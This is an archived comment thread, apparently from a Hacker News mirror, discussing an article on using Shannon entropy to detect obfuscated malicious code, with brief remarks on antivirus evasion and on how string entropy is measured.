💾 Archived View for dioskouroi.xyz › thread › 29430823 captured on 2021-12-03 at 14:04:38. Gemini links have been rewritten to link to archived content

View Raw

More Information

➡️ Next capture (2021-12-04)

-=-=-=-=-=-=-

Using Entropy to Identify Obfuscated Malicious Code

Author: MiffedIt

Score: 12

Comments: 5

Date: 2021-12-03 15:06:51

Web Link

________________________________________________________________________________

motohagiography wrote at 2021-12-03 18:16:18:

The table of typical entropy of those encodings is extra useful if you hack around with CyberChef. Embedded and nested zip files would be another common encoding mechanism used to bypass AV.

twox2 wrote at 2021-12-03 17:24:15:

"Large numbers of obfuscated strings are uncommon in benign software. "

I think this is simply not true when it comes to the web.

staticassertion wrote at 2021-12-03 17:27:44:

So the next obfuscation technique would be to encode strings using a low entropy encoding, yeah?

ihm wrote at 2021-12-03 16:49:38:

What do they mean by entropy of a string? Entropy of the distribution of frequencies of characters? N-grams?

lwl wrote at 2021-12-03 17:14:12:

In this particular case, we're referencing Shannon Entropy. We've got a few other items that also look at bigrams on a per-language basis. As you can imagine, this changes depending on the language used for the given software package.